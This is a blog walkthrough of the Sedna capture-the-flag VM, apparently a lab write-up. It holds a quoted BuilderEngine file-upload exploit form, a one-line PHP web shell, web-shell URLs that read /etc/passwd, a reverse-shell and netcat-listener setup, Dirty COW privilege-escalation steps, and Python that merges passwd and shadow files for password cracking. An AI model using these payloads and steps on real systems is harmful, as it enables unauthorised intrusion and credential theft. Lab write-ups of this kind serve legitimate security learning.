WWRDPLDN

This shall be a record of my escapades into the world of ones and zeros.

Sedna

wwrdpldnadmin | 19 May, 2017 21:43

Sedna is the second VM in a three-part series. It is rated intermediate; I would consider the retrieval of the flags intermediate, but the breaching of the server closer to beginner.

The VM boots and presents me with an IP address: 192.168.241.129

Recon is the first step in hacking. I usually start with an nmap scan.

nmap -sS -sU -T4 -A -v 192.168.241.129

Next, I run enum4linux since I see 445 is open.

# enum4linux 192.168.241.129

=========================================

|    OS information on 192.168.241.129    |

 =========================================

[+] Got OS info for 192.168.241.129 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.1.6-Ubuntu]

[+] Got OS info for 192.168.241.129 from srvinfo:

            SEDNA          Wk Sv PrQ Unx NT SNT Sedna server (Samba, Ubuntu)

            platform_id     : 500

            os version      :  4.9

            server type     :  0x809a03

================================

|    Users on 192.168.241.129    |

 ================================

index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: viper Name: viper     Desc:

index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: root  Name: root       Desc:

user:[viper] rid:[0x3e8]

user:[root] rid:[0x3e9]

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled

Minimum Password Length: 5

 

==========================================================================

|    Users on 192.168.241.129 via RID cycling (RIDS: 500-550,1000-1050)    |

 ==========================================================================

[I] Found new SID: S-1-5-21-2217169221-2747901371-1699642345

[I] Found new SID: S-1-22-1

[I] Found new SID: S-1-5-32

[+] Enumerating users using SID S-1-5-21-2217169221-2747901371-1699642345 and logon username '', password ''

S-1-5-21-2217169221-2747901371-1699642345-1000 SEDNA\viper (Local User)

S-1-5-21-2217169221-2747901371-1699642345-1001 SEDNA\root (Local User)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\crackmeforpoints (Local User)

Next I open the browser and navigate to the root page. I am presented with a familiar image. Clicking on it reveals another familiar image.

Dirbuster reveals more than just the two base images at http://192.168.241.129:80


A casual look through these directories revealed the web application they were for.


A quick check for builderengine on Exploit-DB showed two versions of a Remote File Inclusion vulnerability. One is for metasploit and one manual. I decided to use the manual one.

https://www.exploit-db.com/exploits/40390/

<!--

# Exploit Title: BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0

# Date: 18/09/2016

# Exploit Author: metanubix

# Vendor Homepage: http://builderengine.org/

# Software Link: http://builderengine.org/page-cms-download.html

# Version: 3.5.0

# Tested on: Kali Linux 2.0 64 bit

# Google Dork: intext:"BuilderEngine Ltd. All Right Reserved"

 

 Unauthenticated Unrestricted File Upload:

        POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/

        Vulnerable Parameter: files[]

 

        We can upload test.php and reach the file via the following link:

        /files/test.php

-->

<html>

<body>

<form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">

        <input type="file" name="files[]" />

        <input type="submit" value="send" />

</form>

</body>

</html>

 

I create an html page on my kali box, copy/paste the html code and modify for my environment.

<html>

<body>

<form method="post" action="http://192.168.241.129/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">

        <input type="file" name="files[]" />

        <input type="submit" value="send" />

</form>

</body>

</html>

I open this new page locally:


I click browse and choose a text file, test.txt and click send. I receive the following response:


Ok, looks good. I navigate to the directory that the file is supposed to be dumped into:


That’s my test file. Let’s see where we can go from here. I repeat the process, but this time I upload my favorite “easy phpeasy” script, shell.php, containing:

<?php

system($_GET["com"]);

?>

Now I navigate to this new file and add the command syntax:

 http://192.168.241.129/files/shell.php?com=ls


Done and done. Let’s see what we can enumerate. (Many hackers would prefer to upload a reverse shell at this point. I often do this myself, but lately I’ve been trying to reduce the number of tools I upload so that I can cover my tracks more easily. It may come down to uploading a shell, but for now I’m going to see what I can learn by searching and reading. Remember, the first step is recon. You return to this step many times during a pentest. Programmers may live by “Hello World”; hackers live by “Goto 10”.)

After casually looking through the directories using ls, I find some info:

http://192.168.241.129/files/shell.php?com=cat%20/etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

libuuid:x:100:101::/var/lib/libuuid:

syslog:x:101:104::/home/syslog:/bin/false

mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false

messagebus:x:103:108::/var/run/dbus:/bin/false

bind:x:104:115::/var/cache/bind:/bin/false

postfix:x:105:116::/var/spool/postfix:/bin/false

dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/bin/false

dovecot:x:107:118:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false

dovenull:x:108:119:Dovecot login user,,,:/nonexistent:/bin/false

landscape:x:109:120::/var/lib/landscape:/bin/false

sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin

postgres:x:111:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

avahi:x:112:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false

colord:x:113:124:colord colour management daemon,,,:/var/lib/colord:/bin/false

libvirt-qemu:x:114:107:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false

libvirt-dnsmasq:x:115:125:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false

tomcat7:x:116:126::/usr/share/tomcat7:/bin/false

crackmeforpoints:x:1000:1000::/home/crackmeforpoints:

statd:x:117:65534::/var/lib/nfs:/bin/false

 

http://192.168.241.129/files/shell.php?com=cat%20/etc/*release*

DISTRIB_ID=Ubuntu

DISTRIB_RELEASE=14.04

DISTRIB_CODENAME=trusty

DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"

NAME="Ubuntu"

VERSION="14.04.1 LTS, Trusty Tahr"

ID=ubuntu

ID_LIKE=debian

PRETTY_NAME="Ubuntu 14.04.1 LTS"

VERSION_ID="14.04"

HOME_URL="http://www.ubuntu.com/"

SUPPORT_URL="http://help.ubuntu.com/"

BUG_REPORT_URL=http://bugs.launchpad.net/ubuntu/

 

http://192.168.241.129/files/shell.php?com=cat%20/proc/version

Linux version 3.13.0-32-generic (buildd@roseapple) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014

 

http://192.168.241.129/files/shell.php?com=cat%20../../flag.txt

bfbb7e6e6e88d9ae66848b9aeac6b289

 

Now I’m going to go for a shell. Normally I would make my own meterpreter reverse PHP shell here, but metasploit has been very flaky lately with PHP reverse shells. For this reason I have been using pentestmonkey’s PHP reverse shell. It can be found here:

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

 

I alter the PHP reverse shell for my IP, use port 4444 and save it as prs.php. I upload it just as I did shell.php and start a netcat listener:

# nc -nvlp 4444

Listening on [any] 4444 ...

 

Then I navigate to http://192.168.241.129/files/prs.php and get a session.

 

connect to [192.168.241.128] from (UNKNOWN) [192.168.241.129] 44011

Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux

 08:36:32 up  1:30,  0 users,  load average: 0.00, 0.01, 0.05

USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

uid=33(www-data) gid=33(www-data) groups=33(www-data)

/bin/sh: 0: can't access tty; job control turned off

$

 

Now for a “proper” shell:

 

$python -c 'import pty;pty.spawn("/bin/bash")'

www-data@Sedna:/$

 

So this version of Linux and kernel should be vulnerable to one of the overlayfs privilege escalation exploits, but I could not get any of them to work. So I decided to use Dirty COW. Dirty COW is a bit tricky; it likes to crash VMs. The best way I have found to avoid this is to have the commands ready on scratch paper so you can cut and paste. If you are a fast enough typist then this isn’t necessary, but it’s useful the first time. I’m going to list the steps for this one.

 

1)      Download the exploit to your system, https://www.exploit-db.com/exploits/40839/

Save it as whatever you like (I chose firefart.c because that’s the username it creates)

2)      Use the rfi.html uploader used earlier to copy the file to the target


3)      Compile the file on the target machine through our existing netcat shell.

$ gcc -pthread firefart.c -o firefart -lcrypt

4)      Open another terminal and prepare to ssh into the target with the firefart user, don’t hit enter yet.

# ssh firefart@192.168.241.129

5)      Have this command ready on scratch paper

echo 0 > /proc/sys/vm/dirty_writeback_centisecs

6)      In the netcat shell session type ./firefart firefart (the second firefart sets the password to, you guessed it, firefart). Hit enter.

7)      Go to your waiting terminal window with the ssh command and hit enter, then enter the password when prompted (it’s firefart).

8)      Immediately copy and paste the echo 0 > /proc/sys/vm/dirty_writeback_centisecs command into the ssh terminal.

9)      Enjoy your root shell! When you are done, restore the original password file from the backup the exploit leaves in /tmp/passwd.bak (mv /tmp/passwd.bak /etc/passwd); until then root’s line in /etc/passwd stays overwritten with the firefart entry.

 

You have about 20 seconds between step 6 and step 8. If you don’t do this in time, the VM will crash. I did this about three times in a row, trying to figure out why it was doing it, and actually FUBAR’d the VM. I had to dump it and start over. I finally found the fix by searching with Google. I forgot where I found it but, if I can find it again, I will edit and give credit here.

 

Now, for the flags. We already have the first flag without even getting a real shell. Let’s find the next one, probably in the root directory.

 

firefart@Sedna:/var/www# cd /root

firefart@Sedna:~# cat flag.txt

a10828bee17db751de4b93661455830

 

During the dump of /etc/passwd I saw a user named crackmeforpoints. I copied this entry from /etc/passwd and the corresponding entry from /etc/shadow and used John’s unshadow to merge them into a file called, creatively, unshadow. Then I ran john to crack the password.
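What unshadow does, and the triage I would run over the /etc/passwd dump above, as an added example in Python (not the post’s own tooling and not John the Ripper’s code). The passwd entries are copied from the dump; the shadow lines and their $6$ hashes are constructed placeholders for the example, not real digests, so they will not crack, but the merge produces exactly the passwd line with the hash in field two that John reads. The triage also flags crackmeforpoints’s empty shell field, which login treats as /bin/sh, and skips accounts whose shadow entry is locked with * or ! since those cannot be cracked.

```python
#!/usr/bin/env python3
"""unshadow merge plus /etc/passwd triage (added example, not the post's code).

PASSWD lines are copied from the dump in the post.  SHADOW is CONSTRUCTED for
this example: the $6$ (sha512crypt) hashes are placeholders, not real digests.
"""

PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
postgres:x:111:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
crackmeforpoints:x:1000:1000::/home/crackmeforpoints:
"""

# Constructed shadow file: '*' and '!' mean the account is locked (no hash to crack).
SHADOW = """\
root:$6$rootsalt$PLACEHOLDERHASH0:17300:0:99999:7:::
daemon:*:17300:0:99999:7:::
www-data:*:17300:0:99999:7:::
mysql:!:17300:0:99999:7:::
postgres:*:17300:0:99999:7:::
crackmeforpoints:$6$saltsalt$PLACEHOLDERHASH1:17300:0:99999:7:::
"""

SHELLS = ("bash", "sh", "dash", "zsh")   # shells that give an interactive login


def parse_passwd(text):
    """Map user name -> fields.  passwd(5) has 7 colon-separated fields."""
    users = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, uid, gid, gecos, home, shell = line.split(":", 6)
        users[name] = {"uid": int(uid), "gid": int(gid), "gecos": gecos,
                       "home": home, "shell": shell}
    return users


def parse_shadow(text):
    """Map user name -> password field (hash, or a lock marker like '*' / '!')."""
    hashes = {}
    for line in text.splitlines():
        if line.strip():
            name, pw = line.split(":", 2)[:2]
            hashes[name] = pw
    return hashes


def unshadow(passwd_text, shadow_text):
    """Same output shape as John's unshadow: each passwd line with the 'x' in
    field two replaced by that user's shadow entry."""
    hashes = parse_shadow(shadow_text)
    merged = []
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


def crackable(merged_lines):
    """Names whose merged hash field is a real hash rather than a lock marker."""
    names = []
    for line in merged_lines:
        name, pw = line.split(":")[:2]
        if pw and pw not in ("*", "x") and not pw.startswith("!"):
            names.append(name)
    return names


def interactive_accounts(users):
    """Accounts that get a shell on login: a real shell, or an empty shell
    field, which login falls back to /bin/sh for (passwd(5))."""
    return sorted(name for name, u in users.items()
                  if u["shell"] == "" or u["shell"].rsplit("/", 1)[-1] in SHELLS)


if __name__ == "__main__":
    users = parse_passwd(PASSWD)
    merged = unshadow(PASSWD, SHADOW)
    print("interactive:", interactive_accounts(users))
    print("worth cracking:", crackable(merged))
    print("\n".join(merged))           # feed this file to john
```

The merged lines go into the file john reads (john --wordlist=... unshadow, with john picking the sha512crypt format from the $6$ prefix). The point of the triage is to decide where to spend cracking time before running john at all: here root, postgres and crackmeforpoints can log in, but in the constructed shadow only root and crackmeforpoints carry a hash.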

 

I believe this is one of the four flags.

 

I poked around for the last flag. I believe I found it in the tomcat config file /etc/tomcat7/tomcat-users.xml

 


 

Overall I enjoyed this VM. I would like to see the flags handled a little differently; I think it would be better if they were actually named flag1.txt to flag4.txt.

 
